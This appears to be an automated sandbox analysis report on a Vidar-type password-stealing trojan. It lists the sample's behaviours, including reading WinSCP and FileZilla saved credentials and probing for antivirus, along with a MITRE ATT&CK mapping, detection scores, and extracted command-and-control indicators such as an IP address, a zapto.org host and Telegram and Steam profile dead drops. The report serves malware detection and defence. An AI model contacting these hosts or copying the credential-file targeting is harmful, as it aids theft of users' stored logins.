          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_0030A440 GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002FFAE0 GetProcessHeap,RtlAllocateHeap,GetUserNameA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Code function: 0_2_002FFBC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000003007000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

          Stealing of Sensitive Information

Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe PID: 6924, type: MEMORYSTR
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

          Remote Access Functionality

Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe PID: 6924, type: MEMORYSTR
MITRE ATT&CK Matrix (a number preceding a technique name is the report's count badge for that technique; techniques without a number are the matrix template and were not observed):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 211 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 21 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Software Packing | NTDS | 45 System Information Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 41 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 1 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 12 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Virtualization/Sandbox Evasion | Proc Filesystem | 1 System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 211 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Source | Detection | Scanner | Label | Link
SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | 63% | ReversingLabs | Win32.Trojan.Vidar |
SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | 69% | Virustotal | | Browse
SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe | 100% | Joe Sandbox ML | |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
steamcommunity.com | 0% | Virustotal | | Browse
t.me | 0% | Virustotal | | Browse
arpdabl.zapto.org | 12% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 23.50.98.133 | true | true | | unknown
t.me | 149.154.167.99 | true | false | | unknown
arpdabl.zapto.org | 0.0.0.0 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://t.me/armad2a | false | 3%, Virustotal, Browse; Avira URL Cloud: malware | unknown
https://steamcommunity.com/profiles/76561199747278259 | true | Avira URL Cloud: malware | unknown
          • Avira URL Cloud: safe
          unknown
          https://188.245.87.202/rosoftSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://checkout.steampowered.com/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://steamcommunity.com/profiles/76561199747278259exSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://arpdabl.zapto.orgSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmptrue
          • Avira URL Cloud: safe
          unknown
          https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • URL Reputation: safe
          unknown
          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://188.245.87.202/0SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • URL Reputation: safe
          unknown
          https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://store.steampowered.com/;SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://store.steampowered.com/about/76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://steamcommunity.com/my/wishlist/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://t.me/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://188.245.87.202/TSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=englishSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • URL Reputation: safe
          unknown
          https://web.telegram.orgSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://t.me/armad2ahellosqls.dllsqlite3.dllInSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://help.steampowered.com/en/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://steamcommunity.com/market/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://store.steampowered.com/news/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://community.akamai.steamstatic.com/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://arpdabl.zapto..5938.149SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://store.steampowered.com/subscriber_agreement/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://steamcommunity.com/profiles/76561199747278259/inventory/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: malware
          unknown
          https://recaptcha.net/recaptcha/;SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          http://arpdabl.zaptoSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://188.245.87.20276561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://steamcommunity.com/discussions/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=09hfUHwxDUY7&l=eSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          http://arpdabl.zapto.org/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          https://store.steampowered.com/stats/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://medal.tvSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://broadcast.st.dl.eccdnx.comSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://store.steampowered.com/steam_refunds/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          http://store.steampowered.com/privacy_agreemenSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://188.245.87.202/cSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FA5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://steamcommunity.com/workshop/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FA3000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://login.steampowered.com/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://store.steampowered.com/legal/SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadContSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=eSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • URL Reputation: safe
          unknown
          https://api.steampowerSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002F76000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://recaptcha.netSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2605340851.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://store.steampowered.com/76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwSecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2694769785.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.PWS.Steam.37477.6298.10622.exe, 00000000.00000003.2682790694.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
